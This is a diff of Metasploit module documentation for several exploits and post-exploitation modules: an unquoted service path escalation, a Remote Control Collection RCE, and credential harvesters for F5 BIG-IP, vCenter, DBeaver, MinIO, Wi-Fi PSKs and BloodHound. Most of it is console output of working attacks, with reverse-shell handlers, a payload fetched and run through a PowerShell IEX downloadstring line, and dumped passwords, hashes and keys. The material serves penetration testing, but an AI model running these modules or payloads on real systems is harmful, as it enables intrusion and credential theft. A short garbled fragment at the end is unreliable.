+[+] Deleted C:\Program Files\D Subfolder\E.exe
+[*] Meterpreter session 12 opened (192.168.159.128:9090 -> 192.168.159.87:57944) at 2023-01-05 09:46:38 -0500

-Manually start a handler, and restart the service (via GUI) to launch the exploit
-
-```
-msf5 exploit(windows/local/unquoted_service_path) > handler -p windows/meterpreter/reverse_tcp -H 1.1.1.1 -P 4444
-[*] Payload handler running as background job 1.
-
-[*] Started reverse TCP handler on 1.1.1.1:4444 
-msf5 exploit(windows/local/unquoted_service_path) > [*] Sending stage (180291 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49708) at 2020-04-10 14:43:26 -0400
-
-msf5 exploit(windows/local/unquoted_service_path) > sessions -i 2
-[*] Starting interaction with 2...
-
-meterpreter > sysinfo
-Computer        : MSEDGEWIN10
-OS              : Windows 10 (10.0 Build 16299).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 2
-Meterpreter     : x86/windows
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
-```
-
-The most important part!!!
-
-```
-meterpreter > rm "C:\\Program Files\\A Subfolder\\B.exe"
-
+meterpreter > sysinfo
+Computer        : DESKTOP-81CEH16
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > 
 ```
@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+This module utilizes the Remote Control Server's, part
+of the Remote Control Collection by Steppschuh, protocol
+to deploy a payload and run it from the server.  This module will only deploy
+a payload if the server is set without a password (default).
+Tested against 3.1.1.12, current at the time of module writing
+
+Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_control_collection_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
+
+### PATH
+
+The location to write the payload to
+Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `1`.
+
+## Scenarios
+
+###  Remote Control Server 3.1.1.12 on Windows 10
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_mouse.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 1.1.1.1:1978 - Connecting
+[*] 1.1.1.1:1978 - Sending Windows key
+[*] 1.1.1.1:1978 - Opening command prompt
+[*] 1.1.1.1:1978 - Sending stager
+[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 1.1.1.1:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 1.1.1.1
+[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
+[*] 1.1.1.1:1978 - Server stopped.
+[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami 
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Remote Control Server 3.1.1.12 on Windows 10, with a password
+
+Expected to fail.
+
+```
+resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_control_collection.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_control_collection.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_control_collection.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_control_collection_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Connecting and Sending Windows key
+[*] Opening command prompt
+[*] Sending stager
+[*] Using URL: http://2.2.2.2:8080/
+[*] Executing payload
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
+[*] Exploit completed, but no session was created
+```
@@ -3,8 +3,6 @@
 WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).
 This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.

-**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.
-
 ## Example Usage

 ### Windows 2008
@@ -13,6 +13,9 @@ with BusyBox telnetd installed.
  The command telnetd will execute on connect. The default value is `/bin/sh`
  in order to provide a command shell.

+  **TelnetdPath**
+  The path to the telnetd executable on disk. The default value is `telnetd`.
+
 ### Advanced

  **CommandShellCleanupCommand**
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module will check which shell commands are available on a system.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/linux/gather/enum_commands`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive a list of shell commands
+
+
+## Options
+
+### DIR
+
+Optional directory name to list (in addition to default system PATH and common paths)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_commands 
+msf6 post(linux/gather/enum_commands) > set session 1
+session => 1
+msf6 post(linux/gather/enum_commands) > run
+
+[+] Found 3795 executable binaries/commands
+/bin/GET
+/bin/HEAD
+/bin/POST
+/bin/VGAuthService
+/bin/X
+/bin/X11
+/bin/Xephyr
+/bin/Xorg
+/bin/Xwayland
+/bin/[
+/bin/aa-enabled
+/bin/aa-exec
+/bin/aa-features-abi
+
+...
+
+[*] Post module execution completed
+msf6 post(linux/gather/enum_commands) > 
+```
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+This module collects 802-11-Wireless-Security credentials such as
+Access-Point name and Pre-Shared-Key from Linux NetworkManager
+connection configuration files.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a `root` session
+1. Do: `use post/linux/gather/enum_psk`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive credentails for wireless connections
+
+
+## Options
+
+### DIR
+
+The path for NetworkManager configuration files (default: `/etc/NetworkManager/system-connections/`)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_psk 
+msf6 post(linux/gather/enum_psk) > set session 1
+session => 1
+msf6 post(linux/gather/enum_psk) > run
+
+[*] Reading file /etc/NetworkManager/system-connections//Profile 1.nmconnection
+[*] Reading file /etc/NetworkManager/system-connections//test
+
+802-11-wireless-security
+========================
+
+ AccessPoint-Name  PSK
+ ----------------  ---
+ test              1234567890
+
+[+] Credentials stored in: /root/.msf4/loot/20221120081233_default_192.168.200.204_linux.psk.creds_045512.txt
+[*] Post module execution completed
+msf6 post(linux/gather/enum_psk) > 
+```
@@ -0,0 +1,137 @@
+## Vulnerable Application
+
+The application is F5 Big-IP, and I don't think the versions matters but I
+tested on version 17.0.0.1. It can be downloaded as a VMWare image for free
+(you have to create an account) from https://downloads.f5.com. You can register
+for a free 30-day trial if you like, but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: Get any session somehow (`exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800` works well on 17.0.0.1 and earlier, or just use `msfvenom` w/ a Linux payload)
+4. Do: `use post/linux/gather/f5_loot_mcp`
+5. Do `set SESSION <sessionid>`
+6. Do: `run`
+7. You should get the info
+
+## Options
+
+### GATHER_HASHES
+
+If `true`, read a list of local users and passwords (`userdb_entry` values) from mcp.
+
+Default: true
+
+### GATHER_SERVICE_PASSWORDS
+
+If `true`, read upstream service passwords (active directory, LDAP, etc) from different parts of mcp.
+
+Default: true
+
+### GATHER_DB_VARIABLES
+
+If `true`, read configuration information from mcp (note that this is slow).
+
+Default: false (due to the speed)
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 with a root session
+
+First, get a non-root session however you can. I used the rpmspec vuln:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword mybigtestpassword
+HttpPassword => iagotestbigip
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/708677fa-5b30-43e6-9ce3-d84046e9f6e9.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/yE15kZeAwp-1.6.1-7.4.4.noarch.rpm
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:36124) at 2022-11-14 16:12:04 -0800
+
+meterpreter > bg
+```
+
+Then just use the module, set the SESSION, and run it:
+
+```
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > use post/linux/gather/f5_loot_mcp
+msf6 post(linux/gather/f5_loot_mcp) > set SESSION 1
+SESSION => 1
+msf6 post(linux/gather/f5_loot_mcp) > set VERBOSE true
+VERBOSE => true
+msf6 post(linux/gather/f5_loot_mcp) > show options
+
+Module options (post/linux/gather/f5_loot_mcp):
+
+   Name                       Current Setting  Required  Description
+   ----                       ---------------  --------  -----------
+   GATHER_DB_VARIABLES        false            yes       Gather database variables (warning: slow)
+   GATHER_HASHES              true             yes       Gather password hashes from mcp
+   GATHER_UPSTREAM_PASSWORDS  true             yes       Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from mcp
+   SESSION                    1                yes       The session to run this module on
+
+
+View the full module info with the info, or info -d command.
+
+msf6 post(linux/gather/f5_loot_mcp) > run
+
+[*] Gathering users and password hashes from MCP
+[+] admin:$6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi2j0mh.ww9i1
+[+] f5hubblelcdadmin:yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG
+[+] root:$6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr0gocIIyMoc1
+[*] Gathering upstream passwords from MCP
+[*] Trying to fetch LDAP / Active Directory configuration
+[+] dc.msflab.local:636   - ldaps: 'smcintyre:Password1!'
+[*] Trying to fetch Radius configuration
+[+] 192.168.159.12:1812   - radius: ':radiussecret'
+[+] 192.168.159.13:1812   - radius: ':radiusbackup'
+[*] Trying to fetch TACACS+ configuration
+[+] 192.168.159.200:49    - tacacs+: ':tacaspassword'
+[*] Trying to fetch SMTP configuration
+[+] 192.168.159.128:25    - smtp: 'alice:secretpassword'
+[*] Post module execution completed
+```
+
+The module logs information to the Metasploit database (when connected):
+
+```
+msf6 post(linux/gather/f5_loot_mcp) > creds
+Credentials
+===========
+
+host             origin           service            public            private                                                                                              realm  private_type        JtR Format
+----             ------           -------            ------            -------                                                                                              -----  ------------        ----------
+                 192.168.159.119                     smcintyre         Password1!                                                                                                  Password            
+                 192.168.159.119                     admin             $6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi (TRUNCATED)         Nonreplayable hash  sha512,crypt
+                 192.168.159.119                     f5hubblelcdadmin  yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG                                                                            Nonreplayable hash  
+                 192.168.159.119                     root              $6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr (TRUNCATED)         Nonreplayable hash  sha512,crypt
+192.168.159.12   192.168.159.119  1812/tcp (radius)                    radiussecret                                                                                                Password            
+192.168.159.13   192.168.159.119  1812/tcp (radius)                    radiusbackup                                                                                                Password            
+192.168.159.128  192.168.159.119  25/tcp (smtp)      alice             secretpassword                                                                                              Password            
+192.168.159.200  192.168.159.119  49/tcp (tacacs+)                     tacaspassword                                                                                               Password            
+
+msf6 post(linux/gather/f5_loot_mcp) > services
+Services
+========
+
+host             port  proto  name     state  info
+----             ----  -----  ----     -----  ----
+192.168.159.12   1812  tcp    radius   open
+192.168.159.13   1812  tcp    radius   open
+192.168.159.128  25    tcp    smtp     open
+192.168.159.200  49    tcp    tacacs+  open
+
+msf6 post(linux/gather/f5_loot_mcp) >
+```
@@ -274,3 +274,79 @@ msf6 post(linux/gather/vcenter_secrets_dump) > dump
 [+]     AD User: sam@cesium137.io
 [+]     AD Pass: Gr33n3gg$!
 [*] Post module execution completed
+```
+
+Example run from meterpreter session on vCenter appliance version 6.7 build-18831049
+
+```
+msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
+msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
+session => 1
+msf6 post(linux/gather/vcenter_secrets_dump) > run
+[*] VMware VirtualCenter 6.7.0 build-18831049
+[*] vCenter Appliance (Embedded)
+[*] Validating target
+[*] Appliance IPv4: 2.2.2.2
+[*] Appliance Hostname: photon-machine.ragedomain
+[*] Appliance OS: VMware Photon Linux 1.0-62c543d
+[*] Gathering vSphere SSO domain information
+[+] vSphere SSO DC DN: cn=photon-machine.ragedomain,ou=Domain Controllers,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: )sM8M]h,YZBQ:kY['h^(
+[*] Extracting tenant and vpx AES encryption key...
+[+] vSphere Tenant AES encryption
+[+]     KEY: ]E6"Jg7V}d{!Q:Lh
+[+]     HEX: 5d4536224a6737567d647b21513a4c68
+[+] vSphere vmware-vpx AES encryption
+[+]     HEX: ac20416a5850df52f1bf889440995871ba52984a893dbe44fd71c5c768aea3be
+[*] Extracting PostgreSQL database credentials
+[+]     VCDB Name: VCDB
+[+]     VCDB User: vc
+[+]     VCDB Pass: MB&|<)haN6Q>{K3O
+[*] Checking for VPX Users
+[-] No VPXUSER entries were found
+[*] Extract ESXi host vpxuser credentials
+[!] No ESXi hosts attached to this vCenter system
+[*] Extracting vSphere SSO domain secrets
+[*] Dumping vmdir schema to LDIF and storing to loot...
+[!] Unable to retrieve ldif contents
+WARNING:  there is already a transaction in progress
+[-] Error processing LDIF file
+[*] Extracting certificates from vSphere platform
+[+] VMCA_ROOT key: /root/.msf4/loot/20221102165124_default_2.2.2.2_vmca_523828.key
+[+] VMCA_ROOT cert: /root/.msf4/loot/20221102165124_default_2.2.2.2_vmca_694934.pem
+[+] SSO_STS_IDP key: /root/.msf4/loot/20221102165125_default_2.2.2.2_idp_031902.key
+[+] SSO_STS_IDP cert: /root/.msf4/loot/20221102165125_default_2.2.2.2_idp_256763.pem
+[+] MACHINE_SSL_CERT Key: /root/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_448485.key
+[+] MACHINE_SSL_CERT Cert: /root/.msf4/loot/20221102165126_default_2.2.2.2___MACHINE_CERT_793765.pem
+[+] MACHINE Key: /root/.msf4/loot/20221102165127_default_2.2.2.2_machine_336860.key
+[+] MACHINE Cert: /root/.msf4/loot/20221102165127_default_2.2.2.2_machine_588424.pem
+[+] VSPHERE-WEBCLIENT Key: /root/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_567378.key
+[+] VSPHERE-WEBCLIENT Cert: /root/.msf4/loot/20221102165127_default_2.2.2.2_vspherewebclien_997605.pem
+[+] VPXD Key: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_521342.key
+[+] VPXD Cert: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxd_415704.pem
+[+] VPXD-EXTENSION Key: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_152066.key
+[+] VPXD-EXTENSION Cert: /root/.msf4/loot/20221102165128_default_2.2.2.2_vpxdextension_359784.pem
+[+] DATA-ENCIPHERMENT Key: /root/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_517854.key
+[+] DATA-ENCIPHERMENT Cert: /root/.msf4/loot/20221102165129_default_2.2.2.2_dataenciphermen_408460.pem
+[+] SMS Key: /root/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_777691.key
+[+] SMS Cert: /root/.msf4/loot/20221102165130_default_2.2.2.2_sms_self_signed_215695.pem
+[*] Searching for secrets in VM Guest Customization Specification XML
+[!] No vpx_customization_spec entries evident
+[*] Retrieving .pgpass file
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for localhost:replication
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for 127.0.0.1:replication
+[+] .pgpass creds found: replicator, BN^qgk&a)Ee2dK@| for /var/run/vpostgres:replication
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for localhost:postgres
+[+] posgres database creds found: postgres, md5fdb13b980a01e3d1ae99b5b55b6e4303
+[+] posgres database creds found: replicator, md5c2a01981014a380b63c0c7c66ad77ba9
+[+] posgres database creds found: vc, md53b5a9fc0dd6c99567e9ca27c459b43d9
+[+] posgres database creds found: vumuser, md5fc719b1b56f02981027379fd15125feb
+[+] posgres database creds found: cns, md5d92e4534c059354dee12a7cc9a79faff
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:postgres
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for localhost:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for 127.0.0.1:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:VCDB
+[+] .pgpass creds found: postgres, i23rYg+oPBQwpn!5 for /var/run/vpostgres:postgres
+[+] Saving the /root/.pgpass contents to /root/.msf4/loot/20221102165131_default_2.2.2.2_.pgpass_509065.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+  DBeaver is free and open source universal database tool for developers and database administrators.
+
+  This module will determine if Dbeaver is installed on the target system and, if it is, it will try to
+  dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
+  where possible.
+
+  Any Dbeaver version on any operating system are supported.
+
+  If it works normally, the connection name, host, username and password saved in the certificate file will be printed
+
+### Installation Steps
+
+  1. Download and run the Dbeaver installer (https://dbeaver.io/files/). Since
+     the encryption algorithm changed in version 6.1.3, it is recommended to
+     test this module against a version below 6.1.3 and also against the latest
+     version.
+  2. Select default installation
+  3. Open the software and create a database connection
+     complete password setting, add the test account password to the certificate.
+
+## Verification Steps
+
+  1. Get a session.
+  2. Do: `set session <session number>`
+  3. Do: `run post/multi/gather/credentials/dbeaver`
+  4. If the system has registry keys for Dbeaver passwords they will be printed out.
+
+## Options
+
+ **XML_FILE_PATH**
+
+Specify an XML configuration file (eg.
+`C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml` or
+`C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver-data-sources.xml`).
+
+ **JSON_DIR_PATH**
+
+Specifies the config dir path for Dbeaver. Ensure that there are two files
+`credentials-config.json` and `data-sources.json` under the directory (eg.
+`"C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver`).
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/dbeaver
+
+[*] Gather Dbeaver Passwords on FireEye
+[+] dbeaver .dbeaver-data-sources.xml saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_319751.txt
+[*] Finished processing C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml
+[+] dbeaver credentials-config.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_334807.txt
+[+] dbeaver data-sources.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_309767.txt
+[*] Finished processing C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver
+[+] Passwords stored in: /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_host.dbeaver_421133.txt
+[+] Dbeaver Password
+================
+
+Name             Protocol    Hostname   Port  Username  Password        DB        URI                                        Type
+----             --------    --------   ----  --------  --------        --        ---                                        ----
+Test_MYSQL       mysql       localhost  3306  root      test_password   db        jdbc:mysql://localhost:3306/db             dev
+Test_PostgreSQL  postgresql  localhost  5432  postgres  test_passwordr  postgres  jdbc:postgresql://localhost:5432/postgres  dev
+localhost        mysql       localhost  3306  root      test_mysql      db        jdbc:mysql://localhost:3306/db             test
+postgres         postgresql  localhost  5432  postgres  test_postgres   postgres  jdbc:postgresql://localhost:5432/postgres  prod
+
+meterpreter >
+```
@@ -0,0 +1,42 @@
+## Vulnerable Application
+[MinIO Client](https://dl.min.io/client/mc/release/)
+The MinIO Client mc command line tool provides a modern alternative to UNIX commands like ls,
+cat, cp, mirror, and diff with support for both filesystems and Amazon S3-compatible cloud storage services.
+Its credential file is saved in the user's home directory in plaintext json.
+## Installation Steps
+
+  1. Download the latest installer of MinIO Client (https://dl.min.io/client/mc/release/).
+  2. Run `mc alias set myminio https://play.min.io minioadmin minioadmin`.
+  3. Run `mc admin info myminio`,check for working.
+
+## Verification Steps
+
+  1. Get a `meterpreter` session on a Windows host.
+  2. Do: `run post/multi/gather/minio_client`
+  3. If the configuration file is found in the system, it will be printed out
+
+## Options
+
+### CONFIG_PATH
+
+Specifies the config file path for MinIO Client (eg. `C:\Users\FireEye\mc\config.json`)
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/minio_client CONFIG_PATH="C:\Users\FireEye\mc\config.json"
+
+[*] Parsing file C:\Users\FireEye\mc\config.json
+MinIO Client Key
+================
+
+name     url                             accessKey             secretKey                                 api   path
+----     ---                             ---------             ---------                                 ---   ----
+gcs      https://storage.googleapis.com  YOUR-ACCESS-KEY-HERE  YOUR-SECRET-KEY-HERE                      S3v2  dns
+local    http://localhost:9000                                                                           S3v4  auto
+myminio  https://play.min.io             minioadmin            minioadmin                                s3v4  auto
+play     https://play.min.io             Q3AM3UQ867SPQQA43P2F  zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG  S3v4  auto
+s3       https://s3.amazonaws.com        YOUR-ACCESS-KEY-HERE  YOUR-SECRET-KEY-HERE                      S3v4  dns
+
+[+] Session info stored in: /home/kali-team/.msf4/loot/20221206193240_default_172.16.153.128_host.minio_756923.txt
+```
@@ -29,7 +29,7 @@ Which method to use to get shaphound running.  Default is `download`.

 ### CollectionMethode

-The collection method to use. This parameter accepts a comma separated list of values. Accepted values are `Default`, `Group`,
+The collection method to use. Accepted values are `Default`, `Group`,
 `LocalAdmin`, `RDP`, `DCOM`, `GPOLocalGroup`, `Session`, `ObjectProps`, `ComputerOnly`, `LoggedOn`, `Trusts`, `ACL`, `Container`,
 `DcOnly`, `All`.  The default method is `Default`.

@@ -61,10 +61,6 @@ Uses LDAPs instead of unencrypted LDAP on port 636. The default value is `false`

 Disables Kerberos Signing on requests. The default value is `false`.

-### SkipPing
-
-Skip all ping checks for computers. This option will most likely be slower as API calls will be made to all computers regardless of
-being up Use this option if ping is disabled on the network for some reason. The default value is `false`.

 ### OutputFolder

@@ -80,22 +76,41 @@ If the cache file (.bin) should NOT be written to disk.  Default is `true`.

 ## Scenarios

-```
-meterpreter > run post/windows/gather/bloodhound
+### Windows 2012 Domain Controller, Download method

-[*] Using URL: http://0.0.0.0:8080/bvqUdtHUQ4De1O3
-[*] Local IP: http://192.168.1.136:8080/bvqUdtHUQ4De1O3
-[*] Invoking BloodHound with: Invoke-BloodHound -CollectionMethod Default -Threads 10 -JSONFolder "C:\Windows\TEMP" -PingTimeout 250 -LoopDelay 300 
-[*] Initializing BloodHound at 6:44 AM on 4/29/2019
-[*] Resolved Collection Methods to Group, LocalAdmin, Session, Trusts
-[*] Starting Enumeration for uplift.local
-[*] Status: 58 objects enumerated (+58 �/s --- Using 58 MB RAM )
-[*] Finished enumeration for uplift.local in 00:00:00.6365050
-[*] 0 hosts failed ping. 0 hosts timedout.
-[*] 
-[*] Compressing data to C:\Windows\TEMP\20190429064444_BloodHound.zip.
-[*] You can upload this file directly to the UI.
-[*] Finished compressing files!
+```
+msf6 post(windows/gather/bloodhound) > run
+
+[*] Using URL: http://1.1.1.1:8080/127mPhBr3dZ
+[*] Loading BloodHound with: IEX (new-object net.webclient).downloadstring('http://1.1.1.1:8080/127mPhBr3dZ')
+[*] Invoking BloodHound with: Invoke-BloodHound -OutputDirectory "C:\Users\ADMINI~1\AppData\Local\Temp" -ZipFileName isid -MemCache -ZipPassword ilvtbfgkcmwszdxjn 
+[*] 2022-11-13T13:45:21.0298446-05:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
+[*] 2022-11-13T13:45:21.4198615-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
+[*] 2022-11-13T13:45:21.4666492-05:00|INFORMATION|Initializing SharpHound at 1:45 PM on 11/13/2022
+[*] 2022-11-13T13:45:22.2154647-05:00|INFORMATION|Loaded cache with stats: 59 ID to type mappings.
+[*]  59 name to SID mappings.
+[*]  0 machine sid mappings.
+[*]  2 sid to domain mappings.
+[*]  0 global catalog mappings.
+[*] 2022-11-13T13:45:22.2310827-05:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
+[*] 2022-11-13T13:45:22.6054639-05:00|INFORMATION|Beginning LDAP search for hoodiecola.com
+[*] 2022-11-13T13:45:22.7458626-05:00|INFORMATION|Producer has finished, closing LDAP channel
+[*] 2022-11-13T13:45:22.7614632-05:00|INFORMATION|LDAP channel closed, waiting for consumers
+[*] 2022-11-13T13:45:53.5431310-05:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 87 MB RAM
+[*] 2022-11-13T13:46:06.1354911-05:00|INFORMATION|Consumers finished, closing output channel
+[*] 2022-11-13T13:46:06.2134955-05:00|INFORMATION|Output channel closed, waiting for output task to complete
+[*] Closing writers
+[*] 2022-11-13T13:46:06.5255088-05:00|INFORMATION|Status: 100 objects finished (+100 2.325581)/s -- Using 89 MB RAM
+[*] 2022-11-13T13:46:06.5255088-05:00|INFORMATION|Enumeration finished in 00:00:43.9260652
+[*] 2022-11-13T13:46:06.7283096-05:00|INFORMATION|Saving cache with stats: 59 ID to type mappings.
+[*]  59 name to SID mappings.
+[*]  0 machine sid mappings.
+[*]  2 sid to domain mappings.
+[*]  0 global catalog mappings.
+[*] 2022-11-13T13:46:06.7439000-05:00|INFORMATION|SharpHound Enumeration Completed at 1:46 PM on 11/13/2022! Happy Graphing!
+[+] Downloaded C:\Users\ADMINI~1\AppData\Local\Temp\20221113134605_isid.zip: /root/.msf4/loot/20221113141655_default_2.2.2.2_windows.ad.blood_027677.zip
+[+] Zip password: ilvtbfgkcmwszdxjn
+[*] Post module execution completed
 ```

 ### Windows 10 non-AD host, Windows Server 2012 AD, Disk Method
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.2
 .0.5